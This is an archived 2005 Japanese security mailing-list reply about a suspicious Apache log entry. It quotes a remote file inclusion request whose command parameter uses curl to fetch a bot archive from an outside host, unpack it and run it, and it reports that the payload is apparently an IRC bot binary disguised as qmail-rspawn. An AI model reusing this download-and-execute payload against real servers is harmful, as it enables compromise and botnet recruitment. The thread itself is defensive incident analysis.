[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[connect24h:9878] Re: bot?

To: connect24h@xxxxxxxxxx
Subject: [connect24h:9878] Re: bot?
From: DANNA <danna@xxxxxxxxxxx>
Date: Wed, 12 Oct 2005 13:02:55 +0900

ども。ダンナ＠サポセンです。

みずたにさん
> おうちのApacheのログに以下のような行がありました。
> 210.178.71.1 - - [12/Oct/2005:02:20:31 +0900] "GET //bbs/skin/zero_vote/error.php?dir=http://tracknr-dhl-usa.com/fbi.gif?&cmd=cd%20/tmp;curl%20-O%20http://tracknr-dhl-usa.com/bot.tgz;tar%20xzvf%20bot.tgz;cd%20bot;./start HTTP/1.1" 404 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

ワームですかね。DLしている実態はボットかもしれません。こんなスクリプ
トを実行してました。

> PATH=:$PATH
> qmail-rspawn
> rm -rf mech.pid
> cd ..
> rm -rf b.tgz*

qmail-rspawnが実際に動くバイナリですが、ざっとStringしたところ、IRC
のライブラリを読んでいるっぽいので、ボット用IRCサーバかボットかIRC
Proxyの可能性があります。ちなみにELFのLinux用バイナリでした。あとは
実際に動かしてどんな反応するか確認してみれば、もうちょっと詳しく分
かると思います。

あと、Googleしたらこんなのに当たりました。
http://lists.xitami.org/pipermail/xitami/2005-March.txt

ではでは。

>-------- Micky's Security Institute ------------<
> danna@xxxxxxxxxxx                              <
> HP   : http://www.hawkeye.ac/micky             <
> Japan Snort Users Group http://www.snort.gr.jp <
>------------------------------------------------<



--[PR]------------------------------------------------------------------
 ＿＿＿＿＿┏━━━━━━━━━━━━━━━━━━━━━━━━┓＿＿＿
 ☆…☆…☆┃　豪華賞品あれこれまとめてセットで当たります！　┃☆…☆
 ￣￣￣￣￣┗━━━━━━━━━━━━━━━━━━━━━━━━┛￣￣￣
　　　　　　　　懸賞ならココ！ふくびき.comであなたも運試し♪
　　　　　 http://www.fukubiki.com/vgu/Regist.do?aid=frml051001
------------------------------------------------------------------[PR]--
■GMO INTERNET GROUP■ GMO INTERNET www.gmo.jp

References:
- [connect24h:9875] bot?
  - From: Masaki Mizutani

Prev by Date: [connect24h:9877] Re: bot?
Next by Date: [connect24h:9879] Re: bot?
Previous by thread: [connect24h:9879] Re: bot?
Next by thread: [connect24h:9876] [情報提供]暗号化ツール
Index(es):
- Date
- Thread